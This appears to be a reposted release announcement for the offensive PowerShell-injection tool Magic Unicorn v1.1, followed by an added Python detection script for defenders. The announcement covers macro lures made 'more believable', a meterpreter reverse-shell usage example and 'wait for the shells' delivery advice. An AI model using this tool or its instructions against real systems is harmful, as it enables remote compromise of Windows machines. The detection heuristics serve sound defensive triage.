Updates Unicorn v-1.1 - a simple tool for using a PowerShell downgrade attack and injecting shellcode straight into memory.

+changelog version 1.1  – 22/04/2015:
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~
* fixed autoopen from not working on some office implementations – now works on all office documents including powerpoint/word/excel
* changed the open description to fix a typo and also make it more believable
* fixed spacing issues when generating macro attack
* added instructions on when using macro on how to add the macro to an office document
* added better description and instructions for powershell injection
* added better description on initial loading of payload

Magic Unicorn is a simple tool for using a PowerShell downgrade attack and injecting shellcode straight into memory. It is based on Matthew Graeber’s PowerShell attacks and the PowerShell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.

Usage is simple: run Magic Unicorn (ensure Metasploit is installed and in the right path) and it will automatically generate a PowerShell command that you simply cut and paste into a command line window or deliver through a payload delivery system.

w0rm32~root@$ python unicorn.py

Unicorn is a PowerShell injection tool utilizing Matthew Graebers attack and expanded to automatically downgrade the process if a 64 bit platform is detected. This is useful in order to ensure that we can deliver a payload with just one set of shellcode instructions. This will work on any version of Windows with PowerShell installed. Simply copy and paste the output and wait for the shells.

Usage: python unicorn.py payload reverse_ipaddr port

Example: python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443
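
For defenders, the delivery chain described above (an Office macro launching a downgraded PowerShell process with a pasted command) can be triaged in process-creation telemetry. The following is an added example, not code from Unicorn or TrustedSec; the event field names, the SysWOW64 path test for the 32-bit downgrade, the encoded-command test and the two-hit alert threshold are assumptions about how the activity appears in logs.

```python
import base64
import ntpath

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}  # hosts named in the changelog
B64_CHARS = set("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=")

def has_encoded_command(command_line, min_len=40):
    """True if -EncodedCommand (any prefix of it, or -ec) is followed by a long base64 blob."""
    tokens = command_line.split()
    for switch, value in zip(tokens, tokens[1:]):
        name = switch[1:].lower() if switch[0] in "-/" else ""
        is_enc = name == "ec" or (name != "" and "encodedcommand".startswith(name))
        value = value.strip('"')
        if is_enc and len(value) >= min_len and set(value) <= B64_CHARS:
            return True
    return False

def findings(event):
    """Return the heuristics a process-creation event trips (empty list: nothing)."""
    image = event["image"].lower()
    if ntpath.basename(image) != "powershell.exe":
        return []
    hits = []
    if ntpath.basename(event["parent_image"].lower()) in OFFICE_PARENTS:
        hits.append("office-parent")        # macro-enabled document spawned PowerShell
    if "\\syswow64\\" in image:
        hits.append("32bit-powershell")     # assumed trace of the 64-bit -> 32-bit downgrade
    if has_encoded_command(event["command_line"]):
        hits.append("encoded-command")
    return hits

def is_alert(event):
    """A single hit is common in admin tooling; alert when two or more coincide."""
    return len(findings(event)) >= 2

# Constructed sample events (field names are hypothetical; the blob is a harmless string).
BLOB = base64.b64encode("Write-Output 'constructed sample data'".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": f"powershell.exe -NoP -W Hidden -enc {BLOB}"},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -File C:\Scripts\backup.ps1"},
    {"parent_image": r"C:\Program Files\Mgmt\agent.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": f"powershell.exe -EncodedCommand {BLOB}"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(is_alert(ev), findings(ev), ev["parent_image"])
```
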

Download: unicorn-1.1.tar.gz | unicorn-1.1.zip
Source: TrustedSec | https://www.trustedsec.com/